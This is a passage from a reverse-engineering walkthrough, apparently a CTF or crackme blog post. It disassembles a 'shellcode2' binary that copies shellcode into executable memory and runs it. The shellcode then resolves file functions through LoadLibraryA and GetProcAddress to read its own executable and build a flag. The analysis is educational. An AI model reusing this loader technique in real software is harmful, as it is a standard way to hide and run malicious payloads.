sym.shellcode2.exe___0MD5__QAE_XZ | 0x00402284 mov byte [var_28h], 0x12 ; 18 | 0x00402288 mov byte [var_27h], 0x24 ; '$' ; 36 | 0x0040228c mov byte [var_26h], 0x28 ; '(' ; 40 | 0x00402290 mov byte [var_25h], 0x34 ; '4' ; 52 | 0x00402294 mov byte [var_24h], 0x5b ; '[' ; 91 | 0x00402298 mov byte [var_23h], 0x23 ; '#' ; 35 | 0x0040229c mov byte [var_22h], 0x26 ; '&amp;' ; 38 | 0x004022a0 mov byte [var_21h], 0x20 ; 32 | 0x004022a4 mov byte [var_20h], 0x35 ; '5' ; 53 | 0x004022a8 mov byte [var_1fh], 0x37 ; '7' ; 55 | 0x004022ac mov byte [var_1eh], 0x4c ; 'L' ; 76 | 0x004022b0 mov byte [var_1dh], 0x28 ; '(' ; 40 | 0x004022b4 mov byte [var_1ch], 0x76 ; 'v' ; 118 | 0x004022b8 mov byte [var_1bh], 0x26 ; '&amp;' ; 38 | 0x004022bc mov byte [var_1ah], 0x33 ; '3' ; 51 | 0x004022c0 mov byte [var_19h], 0x37 ; '7' ; 55 | 0x004022c4 mov byte [var_18h], 0x3a ; ':' ; 58 | 0x004022c8 mov byte [var_17h], 0x27 ; ''' ; 39 | 0x004022cc mov byte [var_16h], 0x3d ; '=' ; 61 | 0x004022d0 mov byte [var_15h], 0x6e ; 'n' ; 110 | 0x004022d4 mov byte [var_14h], 0x25 ; '%' ; 37 | 0x004022d8 mov byte [var_13h], 0x48 ; 'H' ; 72 | 0x004022dc mov byte [var_12h], 0x6f ; 'o' ; 111 | 0x004022e0 mov byte [var_11h], 0x3c ; '&lt;' ; 60 | 0x004022e4 mov byte [var_10h], 0x58 ; 'X' ; 88 | 0x004022e8 mov byte [var_fh], 0x3a ; ':' ; 58 | 0x004022ec mov byte [var_eh], 0x68 ; 'h' ; 104 | 0x004022f0 mov byte [var_dh], 0x2c ; ',' ; 44 | 0x004022f4 mov byte [var_ch], 0x43 ; 'C' ; 67 | 0x004022f8 mov byte [var_bh], 0x73 ; 's' ; 115 | 0x004022fc mov byte [var_ah], 0x10 ; 16 | 0x00402300 mov byte [var_9h], 0xe ; 14 | 0x00402304 mov byte [var_8h], 0x10 ; 16 | 0x00402308 mov byte [var_7h], 0x6b ; 'k' ; 107 | 0x0040230c mov byte [var_6h], 0x10 ; 16 | 0x00402310 mov byte [var_5h], 0x6f ; 'o' ; 111 | 0x00402314 push 0x10 ; 16 | 0x00402316 push 0 ; DWORD dwFlags | 0x00402318 call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; 0x403010 ; ",1" ; HANDLE GetProcessHeap(void) | 0x0040231e push eax ; HANDLE hHeap | 0x0040231f call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; 0x40300c ; " 1" ; LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes) | 0x00402325 mov dword [var_4h], eax | 0x00402328 mov eax, dword [var_4h] | 0x0040232b mov ecx, dword sym.imp.KERNEL32.dll_LoadLibraryA ; [0x403008:4]=0x3110 reloc.KERNEL32.dll_LoadLibraryA | 0x00402331 mov dword [eax], ecx | 0x00402333 mov edx, dword [var_4h] | 0x00402336 mov eax, dword sym.imp.KERNEL32.dll_GetProcAddress ; [0x403004:4]=0x30fe reloc.KERNEL32.dll_GetProcAddress | 0x0040233b mov dword [edx + 4], eax | 0x0040233e mov ecx, dword [var_4h] | 0x00402341 lea edx, [var_28h] | 0x00402344 mov dword [ecx + 8], edx | 0x00402347 mov eax, dword [var_4h] | 0x0040234a mov dword [eax + 0xc], 0x24 ; '$' ; [0x24:4]=-1 ; 36 | 0x00402351 push 0x40 ; '@' ; 64 ; DWORD flProtect | 0x00402353 push 0x1000 ; DWORD flAllocationType | 0x00402358 push 0x248 ; 584 ; SIZE_T dwSize | 0x0040235d push 0 ; LPVOID lpAddress | 0x0040235f call dword [sym.imp.KERNEL32.dll_VirtualAlloc] ; 0x403000 ; LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) | 0x00402365 mov dword [s1], eax | 0x0040236b push 0x248 ; 584 ; size_t n | 0x00402370 push 0x404040 ; '@@@' ; "U\x89\xe5\x81\xec\xbc\x01" ; const void *s2 | 0x00402375 mov ecx, dword [s1] | 0x0040237b push ecx ; void *s1 | 0x0040237c call sub.ntdll.dll_memcpy ; void *memcpy(void *s1, const void *s2, size_t n) | 0x00402381 add esp, 0xc | 0x00402384 push dword [var_4h] | 0x00402387 call dword [s1] | 0x0040238d lea edx, [var_28h] | 0x00402390 push edx | 0x00402391 lea ecx, [var_b8h] | 0x00402397 call sym.shellcode2.exe__digestString_MD5__QAEPADPAD_Z | 0x0040239c mov dword [lpText], eax | 0x004023a2 push 0x30 ; '0' ; 48 ; UINT uType | 0x004023a4 push str.We_ve_been_compromised ; 0x403038 ; "We've been compromised!" ; LPCSTR lpCaption | 0x004023a9 mov eax, dword [lpText] | 0x004023af push eax ; LPCSTR lpText | 0x004023b0 push 0 ; HWND hWnd | 0x004023b2 call dword [sym.imp.USER32.dll_MessageBoxA] ; 0x40301c ; "~1" ; int MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) | 0x004023b8 push 0 ; UINT uExitCode | 0x004023ba call dword [sym.imp.KERNEL32.dll_ExitProcess] ; 0x403014 ; void ExitProcess(UINT uExitCode) | 0x004023c0 xor eax, eax | 0x004023c2 mov esp, ebp | 0x004023c4 pop ebp \ 0x004023c5 ret </code></pre> <p>Right away it looks like we are dealing with quite a few variables. Lets look at the meat and potatoes:</p> <pre><code class="language-assembly">| 0x00402314 push 0x10 ; 16 | 0x00402316 push 0 ; DWORD dwFlags | 0x00402318 call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; 0x403010 ; ",1" ; HANDLE GetProcessHeap(void) | 0x0040231e push eax ; HANDLE hHeap | 0x0040231f call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; 0x40300c ; " 1" ; LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes) | 0x00402325 mov dword [var_4h], eax | 0x00402328 mov eax, dword [var_4h] | 0x0040232b mov ecx, dword sym.imp.KERNEL32.dll_LoadLibraryA ; [0x403008:4]=0x3110 reloc.KERNEL32.dll_LoadLibraryA | 0x00402331 mov dword [eax], ecx | 0x00402333 mov edx, dword [var_4h] | 0x00402336 mov eax, dword sym.imp.KERNEL32.dll_GetProcAddress ; [0x403004:4]=0x30fe reloc.KERNEL32.dll_GetProcAddress | 0x0040233b mov dword [edx + 4], eax | 0x0040233e mov ecx, dword [var_4h] | 0x00402341 lea edx, [var_28h] | 0x00402344 mov dword [ecx + 8], edx | 0x00402347 mov eax, dword [var_4h] | 0x0040234a mov dword [eax + 0xc], 0x24 ; '$' ; [0x24:4]=-1 ; 36 | 0x00402351 push 0x40 ; '@' ; 64 ; DWORD flProtect | 0x00402353 push 0x1000 ; DWORD flAllocationType | 0x00402358 push 0x248 ; 584 ; SIZE_T dwSize | 0x0040235d push 0 ; LPVOID lpAddress | 0x0040235f call dword [sym.imp.KERNEL32.dll_VirtualAlloc] ; 0x403000 ; LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) | 0x00402365 mov dword [s1], eax | 0x0040236b push 0x248 ; 584 ; size_t n | 0x00402370 push 0x404040 ; '@@@' ; "U\x89\xe5\x81\xec\xbc\x01" ; const void *s2 | 0x00402375 mov ecx, dword [s1] | 0x0040237b push ecx ; void *s1 | 0x0040237c call sub.ntdll.dll_memcpy ; void *memcpy(void *s1, const void *s2, size_t n) | 0x00402381 add esp, 0xc | 0x00402384 push dword [var_4h] | 0x00402387 call dword [s1] </code></pre> <p>Right away a lot of this looks very familiar to the last challenge. We are grabbing the heap and allocating a piece of it:</p> <pre><code class="language-assembly">| 0x00402314 push 0x10 ; 16 | 0x00402316 push 0 ; DWORD dwFlags | 0x00402318 call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; 0x403010 ; ",1" ; HANDLE GetProcessHeap(void) | 0x0040231e push eax ; HANDLE hHeap | 0x0040231f call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; 0x40300c ; " 1" ; LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes) | 0x00402325 mov dword [var_4h], eax | 0x00402328 mov eax, dword [var_4h] </code></pre> <p>The heap is then taken from the eax register and stored in a dword var_4h and then put back into eax.</p> <pre><code class="language-assembly">| 0x0040232b mov ecx, dword sym.imp.KERNEL32.dll_LoadLibraryA ; [0x403008:4]=0x3110 reloc.KERNEL32.dll_LoadLibraryA | 0x00402331 mov dword [eax], ecx | 0x00402333 mov edx, dword [var_4h] | 0x00402336 mov eax, dword sym.imp.KERNEL32.dll_GetProcAddress ; [0x403004:4]=0x30fe reloc.KERNEL32.dll_GetProcAddress | 0x0040233b mov dword [edx + 4], eax | 0x0040233e mov ecx, dword [var_4h] | 0x00402341 lea edx, [var_28h] | 0x00402344 mov dword [ecx + 8], edx | 0x00402347 mov eax, dword [var_4h] | 0x0040234a mov dword [eax + 0xc], 0x24 ; '$' ; [0x24:4]=-1 ; 36 </code></pre> <p>It then looks like we are storing some functions as dwords and moving them to registers. This looks to be getting our functions setup in our heap.</p> <p>After all of this we are allocating page space, copying our shellcode over, and then executing it.</p> <pre><code class="language-assembly">| 0x00402351 push 0x40 ; '@' ; 64 ; DWORD flProtect | 0x00402353 push 0x1000 ; DWORD flAllocationType | 0x00402358 push 0x248 ; 584 ; SIZE_T dwSize | 0x0040235d push 0 ; LPVOID lpAddress | 0x0040235f call dword [sym.imp.KERNEL32.dll_VirtualAlloc] ; 0x403000 ; LPVOID VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) | 0x00402365 mov dword [s1], eax | 0x0040236b push 0x248 ; 584 ; size_t n | 0x00402370 push 0x404040 ; '@@@' ; "U\x89\xe5\x81\xec\xbc\x01" ; const void *s2 | 0x00402375 mov ecx, dword [s1] | 0x0040237b push ecx ; void *s1 | 0x0040237c call sub.ntdll.dll_memcpy ; void *memcpy(void *s1, const void *s2, size_t n) | 0x00402381 add esp, 0xc | 0x00402384 push dword [var_4h] | 0x00402387 call dword [s1] </code></pre> <p>It looks like our shellcode is 584 bytes starting at 0x404040. Cutter has a neat feature where you can copy in a byte array and it will parse it as shellcode:</p> <p><img src="https://bizarrechaos.com/attachments/shellcode2-cutter-shellcode.png" alt="" /></p> <p>You can also just click on the offset in the original code and view the dissassembly there. Lets look at the disassembly:</p> <pre><code class="language-assembly"> 0x00404040 push ebp 0x00404041 mov ebp, esp 0x00404043 sub esp, 0x1bc 0x00404049 mov byte [ebp - 0x58], 0x6d ; 'm' ; 109 0x0040404d mov byte [ebp - 0x57], 0x73 ; 's' ; 115 0x00404051 mov byte [ebp - 0x56], 0x76 ; 'v' ; 118 0x00404055 mov byte [ebp - 0x55], 0x63 ; 'c' ; 99 0x00404059 mov byte [ebp - 0x54], 0x72 ; 'r' ; 114 0x0040405d mov byte [ebp - 0x53], 0x74 ; 't' ; 116 0x00404061 mov byte [ebp - 0x52], 0x2e ; '.' ; 46 0x00404065 mov byte [ebp - 0x51], 0x64 ; 'd' ; 100 0x00404069 mov byte [ebp - 0x50], 0x6c ; 'l' ; 108 0x0040406d mov byte [ebp - 0x4f], 0x6c ; 'l' ; 108 0x00404071 mov byte [ebp - 0x4e], 0 0x00404075 mov byte [ebp - 0xa0], 0x6b ; 'k' ; 107 0x0040407c mov byte [ebp - 0x9f], 0x65 ; 'e' ; 101 0x00404083 mov byte [ebp - 0x9e], 0x72 ; 'r' ; 114 0x0040408a mov byte [ebp - 0x9d], 0x6e ; 'n' ; 110 0x00404091 mov byte [ebp - 0x9c], 0x65 ; 'e' ; 101 0x00404098 mov byte [ebp - 0x9b], 0x6c ; 'l' ; 108 0x0040409f mov byte [ebp - 0x9a], 0x33 ; '3' ; 51 0x004040a6 mov byte [ebp - 0x99], 0x32 ; '2' ; 50 0x004040ad mov byte [ebp - 0x98], 0x2e ; '.' ; 46 0x004040b4 mov byte [ebp - 0x97], 0x64 ; 'd' ; 100 0x004040bb mov byte [ebp - 0x96], 0x6c ; 'l' ; 108 0x004040c2 mov byte [ebp - 0x95], 0x6c ; 'l' ; 108 0x004040c9 mov byte [ebp - 0x94], 0 0x004040d0 mov byte [ebp - 0x1b8], 0x66 ; 'f' ; 102 0x004040d7 mov byte [ebp - 0x1b7], 0x6f ; 'o' ; 111 0x004040de mov byte [ebp - 0x1b6], 0x70 ; 'p' ; 112 0x004040e5 mov byte [ebp - 0x1b5], 0x65 ; 'e' ; 101 0x004040ec mov byte [ebp - 0x1b4], 0x6e ; 'n' ; 110 0x004040f3 mov byte [ebp - 0x1b3], 0 0x004040fa mov byte [ebp - 0x4c], 0x66 ; 'f' ; 102 0x004040fe mov byte [ebp - 0x4b], 0x72 ; 'r' ; 114 0x00404102 mov byte [ebp - 0x4a], 0x65 ; 'e' ; 101 0x00404106 mov byte [ebp - 0x49], 0x61 ; 'a' ; 97 0x0040410a mov byte [ebp - 0x48], 0x64 ; 'd' ; 100 0x0040410e mov byte [ebp - 0x47], 0 0x00404112 mov byte [ebp - 0xc], 0x66 ; 'f' ; 102 0x00404116 mov byte [ebp - 0xb], 0x73 ; 's' ; 115 0x0040411a mov byte [ebp - 0xa], 0x65 ; 'e' ; 101 0x0040411e mov byte [ebp - 9], 0x65 ; 'e' ; 101 0x00404122 mov byte [ebp - 8], 0x6b ; 'k' ; 107 0x00404126 mov byte [ebp - 7], 0 0x0040412a mov byte [ebp - 0x60], 0x66 ; 'f' ; 102 0x0040412e mov byte [ebp - 0x5f], 0x63 ; 'c' ; 99 0x00404132 mov byte [ebp - 0x5e], 0x6c ; 'l' ; 108 0x00404136 mov byte [ebp - 0x5d], 0x6f ; 'o' ; 111 0x0040413a mov byte [ebp - 0x5c], 0x73 ; 's' ; 115 0x0040413e mov byte [ebp - 0x5b], 0x65 ; 'e' ; 101 0x00404142 mov byte [ebp - 0x5a], 0 0x00404146 mov byte [ebp - 0x78], 0x47 ; 'G' ; 71 0x0040414a mov byte [ebp - 0x77], 0x65 ; 'e' ; 101 0x0040414e mov byte [ebp - 0x76], 0x74 ; 't' ; 116 0x00404152 mov byte [ebp - 0x75], 0x4d ; 'M' ; 77 0x00404156 mov byte [ebp - 0x74], 0x6f ; 'o' ; 111 0x0040415a mov byte [ebp - 0x73], 0x64 ; 'd' ; 100 0x0040415e mov byte [ebp - 0x72], 0x75 ; 'u' ; 117 0x00404162 mov byte [ebp - 0x71], 0x6c ; 'l' ; 108 0x00404166 mov byte [ebp - 0x70], 0x65 ; 'e' ; 101 0x0040416a mov byte [ebp - 0x6f], 0x46 ; 'F' ; 70 0x0040416e mov byte [ebp - 0x6e], 0x69 ; 'i' ; 105 0x00404172 mov byte [ebp - 0x6d], 0x6c ; 'l' ; 108 0x00404176 mov byte [ebp - 0x6c], 0x65 ; 'e' ; 101 0x0040417a mov byte [ebp - 0x6b], 0x4e ; 'N' ; 78 0x0040417e mov byte [ebp - 0x6a], 0x61 ; 'a' ; 97 0x00404182 mov byte [ebp - 0x69], 0x6d ; 'm' ; 109 0x00404186 mov byte [ebp - 0x68], 0x65 ; 'e' ; 101 0x0040418a mov byte [ebp - 0x67], 0x41 ; 'A' ; 65 0x0040418e mov byte [ebp - 0x66], 0 0x00404192 mov byte [ebp - 0x7c], 0x72 ; 'r' ; 114 0x00404196 mov byte [ebp - 0x7b], 0x62 ; 'b' ; 98 0x0040419a mov byte [ebp - 0x7a], 0 0x0040419e mov eax, dword [ebp + 8] ; [0x8:4]=-1 ; 8 0x004041a1 mov ecx, dword [eax] 0x004041a3 mov dword [ebp - 4], ecx 0x004041a6 mov ecx, dword [eax + 4] ; [0x4:4]=-1 ; 4 0x004041a9 mov dword [ebp - 0x44], ecx 0x004041ac lea ecx, [ebp - 0x58] 0x004041af push ecx 0x004041b0 call dword [ebp - 4] 0x004041b3 mov dword [ebp - 0x3c], eax 0x004041b6 lea edx, [ebp - 0xa0] 0x004041bc push edx 0x004041bd call dword [ebp - 4] 0x004041c0 mov dword [ebp - 0x84], eax 0x004041c6 lea eax, [ebp - 0x78] 0x004041c9 push eax 0x004041ca mov ecx, dword [ebp - 0x84] 0x004041d0 push ecx 0x004041d1 call dword [ebp - 0x44] 0x004041d4 mov dword [ebp - 0x10], eax 0x004041d7 lea edx, [ebp - 0x1b8] 0x004041dd push edx 0x004041de mov eax, dword [ebp - 0x3c] 0x004041e1 push eax 0x004041e2 call dword [ebp - 0x44] 0x004041e5 mov dword [ebp - 0x80], eax 0x004041e8 lea ecx, [ebp - 0xc] 0x004041eb push ecx 0x004041ec mov edx, dword [ebp - 0x3c] 0x004041ef push edx 0x004041f0 call dword [ebp - 0x44] 0x004041f3 mov dword [ebp - 0xa4], eax 0x004041f9 lea eax, [ebp - 0x4c] 0x004041fc push eax 0x004041fd mov ecx, dword [ebp - 0x3c] 0x00404200 push ecx 0x00404201 call dword [ebp - 0x44] 0x00404204 mov dword [ebp - 0x90], eax 0x0040420a lea edx, [ebp - 0x60] 0x0040420d push edx 0x0040420e mov eax, dword [ebp - 0x3c] 0x00404211 push eax 0x00404212 call dword [ebp - 0x44] 0x00404215 mov dword [ebp - 0x64], eax 0x00404218 push 0x104 ; 260 0x0040421d lea ecx, [ebp - 0x1b0] 0x00404223 push ecx 0x00404224 push 0 0x00404226 call dword [ebp - 0x10] 0x00404229 lea edx, [ebp - 0x7c] 0x0040422c push edx 0x0040422d lea eax, [ebp - 0x1b0] 0x00404233 push eax 0x00404234 call dword [ebp - 0x80] 0x00404237 add esp, 8 0x0040423a mov dword [ebp - 0x40], eax 0x0040423d push 0 0x0040423f push 0x4e ; 'N' ; 78 0x00404241 mov ecx, dword [ebp - 0x40] 0x00404244 push ecx 0x00404245 call dword [ebp - 0xa4] 0x0040424b add esp, 0xc 0x0040424e mov edx, dword [ebp - 0x40] 0x00404251 push edx 0x00404252 push 1 ; 1 0x00404254 push 0x26 ; '&amp;' ; 38 0x00404256 lea eax, [ebp - 0x38] 0x00404259 push eax 0x0040425a call dword [ebp - 0x90] 0x00404260 add esp, 0x10 0x00404263 mov ecx, dword [ebp - 0x40] 0x00404266 push ecx 0x00404267 call dword [ebp - 0x64] 0x0040426a add esp, 4 0x0040426d mov edx, dword [ebp + 8] ; [0x8:4]=-1 ; 8 0x00404270 mov ecx, dword [edx + 0xc] ; [0xc:4]=-1 ; 12 0x00404273 mov edi, dword [edx + 8] ; [0x8:4]=-1 ; 8 0x00404274 .string "z\b1\xd2\x8aD" ; len=7 ;-- "z\b1ҊD": : 0x0040427b enter 0x430, 0x17 ; 1072 : 0x0040427f inc edx : 0x00404280 cmp edx, ecx `=&lt; 0x00404282 jne 0x404278 0x00404284 mov esp, ebp 0x00404286 pop ebp 0x00404287 ret </code></pre> <p>The first thing we see is a large stack string being setup: Lets copy 0x00404049 to 0x00404196 to a file and run some commandline-fu on it to make it a bit easier on the eyes:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cat stack_string.txt | cut -d';' -f2 | sed -e 's/ //g' -e 's/\'//g' -e 's/^ //g' -e 's/^0x00404.*/ /g' | tr '\n' '\0' msvcrt.dll kernel32.dll fopen fread fseek fclose GetModuleFileNameA rb </code></pre></div></div> <p>Much better. It looks like our stack string contains 2 dll names (msvcrt.dll, kernel32.dll) some basic c++ file commands (fopen, fread, fseek, fclose) and a function (GetModuleFileNameA). The last 2 characters “rb” are most likely parameters we are gonna pass to fopen which will tell it readonly and present the file as a binary object. I think its safe to assume we are going to be opening a file, grabbing some bytes, and creating our flag from that. Lets pull up the docs. Besides the functions and dlls above lets also get the docs for the two functions we saved as dwords earlier.</p> <p><a href="https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-getmodulefilenamea">GetModuleFileNameA</a></p> <blockquote> <p>Retrieves the fully qualified path for the file that contains the specified module. The module must have been loaded by the current process.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">DWORD</span> <span class="nf">GetModuleFileNameA</span><span class="p">(</span> <span class="n">HMODULE</span> <span class="n">hModule</span><span class="p">,</span> <span class="n">LPSTR</span> <span class="n">lpFilename</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">nSize</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-loadlibrarya">LoadLibraryA</a></p> <blockquote> <p>Loads the specified module into the address space of the calling process. The specified module may cause other modules to be loaded.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">HMODULE</span> <span class="nf">LoadLibraryA</span><span class="p">(</span> <span class="n">LPCSTR</span> <span class="n">lpLibFileName</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-getprocaddress">GetProcAddress</a></p> <blockquote> <p>Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">FARPROC</span> <span class="nf">GetProcAddress</span><span class="p">(</span> <span class="n">HMODULE</span> <span class="n">hModule</span><span class="p">,</span> <span class="n">LPCSTR</span> <span class="n">lpProcName</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://en.wikipedia.org/wiki/Microsoft_Windows_library_files#MSVCRT.DLL,_MSVCP*.DLL_and_CRTDLL.DLL">msvcrt.dll</a></p> <blockquote> <p>MSVCRT.DLL is the C standard library for the Visual C++ (MSVC) compiler from version 4.2 to 6.0. It provides programs compiled by these versions of MSVC with most of the standard C library functions. These include string manipulation, memory allocation, C-style input/output calls, and others.</p> </blockquote> <p><a href="https://en.wikipedia.org/wiki/Microsoft_Windows_library_files#KERNEL32.DLL">kernel32.dll</a></p> <blockquote> <p>KERNEL32.DLL exposes to applications most of the Win32 base APIs, such as memory management, input/output (I/O) operations, process and thread creation, and synchronization functions. Many of these are implemented within KERNEL32.DLL by calling corresponding functions in the native API, exposed by NTDLL.DLL.</p> </blockquote> <p><a href="https://devdocs.io/cpp/io/c/fopen">fopen</a></p> <blockquote> <p>Opens a file indicated by filename and returns a file stream associated with that file. mode is used to determine the file access mode.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">std</span><span class="o">::</span><span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen</span><span class="p">(</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">filename</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://devdocs.io/cpp/io/c/fread">fread</a></p> <blockquote> <p>Reads up to count objects into the array buffer from the given input stream stream as if by calling std::fgetc size times for each object, and storing the results, in the order obtained, into the successive positions of buffer, which is reinterpreted as an array of unsigned char. The file position indicator for the stream is advanced by the number of characters read.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">std</span><span class="o">::</span><span class="kt">size_t</span> <span class="nf">fread</span><span class="p">(</span> <span class="kt">void</span><span class="o">*</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="kt">FILE</span><span class="o">*</span> <span class="n">stream</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://devdocs.io/cpp/io/c/fseek">fseek</a></p> <blockquote> <p>Sets the file position indicator for the file stream stream. If the stream is open in binary mode, the new position is exactly offset bytes measured from the beginning of the file if origin is SEEK_SET, from the current file position if origin is SEEK_CUR, and from the end of the file if origin is SEEK_END. Binary streams are not required to support SEEK_END, in particular if additional null bytes are output.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">fseek</span><span class="p">(</span> <span class="n">std</span><span class="o">::</span><span class="kt">FILE</span><span class="o">*</span> <span class="n">stream</span><span class="p">,</span> <span class="kt">long</span> <span class="n">offset</span><span class="p">,</span> <span class="kt">int</span> <span class="n">origin</span> <span class="p">);</span> </code></pre></div></div> <p><a href="https://devdocs.io/cpp/io/c/fclose">fclose</a></p> <blockquote> <p>Closes the given file stream. Any unwritten buffered data are flushed to the OS. Any unread buffered data are discarded.</p> </blockquote> <div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">fclose</span><span class="p">(</span> <span class="n">std</span><span class="o">::</span><span class="kt">FILE</span><span class="o">*</span> <span class="n">stream</span> <span class="p">);</span> </code></pre></div></div> <p>Lets list these out with their pointers for easy reference later:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb </code></pre></div></div> <p>Alright, so we have a pretty good guess as to what this shellcode is going to do. Lets examine the rest of it and see if we are right:</p> <pre><code class="language-assembly"> 0x0040419e mov eax, dword [ebp + 8] ; [0x8:4]=-1 ; 8 0x004041a1 mov ecx, dword [eax] 0x004041a3 mov dword [ebp - 4], ecx 0x004041a6 mov ecx, dword [eax + 4] ; [0x4:4]=-1 ; 4 0x004041a9 mov dword [ebp - 0x44], ecx 0x004041ac lea ecx, [ebp - 0x58] 0x004041af push ecx 0x004041b0 call dword [ebp - 4] 0x004041b3 mov dword [ebp - 0x3c], eax </code></pre> <p>We are calling LoadLibraryA after pushing msvcrt.dll to the stck. We are then saving the return to ebp 0x3c. Lets update our reference:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle </code></pre></div></div> <pre><code class="language-assembly"> 0x004041b6 lea edx, [ebp - 0xa0] 0x004041bc push edx 0x004041bd call dword [ebp - 4] 0x004041c0 mov dword [ebp - 0x84], eax </code></pre> <p>Next we call LoadLibraryA after pushing kernel32.dll to the stack. We are then saving the return to ebp 0x84. Lets update our reference and move on.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle dword [ebp - 0x84] kernel32.dll module handle </code></pre></div></div> <pre><code class="language-assembly"> 0x004041c6 lea eax, [ebp - 0x78] 0x004041c9 push eax 0x004041ca mov ecx, dword [ebp - 0x84] 0x004041d0 push ecx 0x004041d1 call dword [ebp - 0x44] 0x004041d4 mov dword [ebp - 0x10], eax </code></pre> <p>Next we are pushing GetModuleFileNameA, and then kernel32.dll handle to the stack. We are then calling GetProcAddress(kernel32.dll, GetModuleFileNameA). This returns the address of GetModuleFileNameA and we are saving that in ebp 0x10.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle dword [ebp - 0x84] kernel32.dll module handle dword [ebp - 0x10] GetModuleFileNameA address </code></pre></div></div> <pre><code class="language-assembly"> 0x004041d7 lea edx, [ebp - 0x1b8] 0x004041dd push edx 0x004041de mov eax, dword [ebp - 0x3c] 0x004041e1 push eax 0x004041e2 call dword [ebp - 0x44] 0x004041e5 mov dword [ebp - 0x80], eax </code></pre> <p>Next up it looks like we are pushing fopen, and msvcrt.dll handle to the stack. Then we are calling GetProcAddress on them. The return address for fopen is saved as ebp 0x80.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ebp 0x58 msvcrt.dll ebp 0xa0 kernel32.dll ebp 0x1b8 fopen ebp 0x4c fread ebp 0xc fseek ebp 0x60 fclose ebp 0x78 GetModuleFileNameA ebp 0x7c rb dword [ebp - 4] LoadLibraryA dword [ebp - 0x44] GetProcAddress dword [ebp - 0x3c] msvcrt.dll module handle dword [ebp - 0x84] kernel32.dll module handle dword [ebp - 0x10] GetModuleFileNameA address dword [ebp - 0x80] fopen address </code></pre></div></div> <pre><code class="language-assembly"> 0x004041e8 lea ecx, [ebp - 0xc] 0x004041eb push ecx 0x004041ec mov edx, dword [ebp - 0x3c] 0x004041ef push edx 0x004041f0 call dword [ebp - 0x44] 0x004041f3 mov dword [ebp - 0xa4], eax </code></pre> <p>Here we are getting the address to fseek as ebp 0xa4.</p> <pre><code class="language-assembly"> 0x004041f9 lea eax, [ebp - 0x4c] 0x004041fc push eax 0x004041fd mov ecx, dword [ebp - 0x3c] 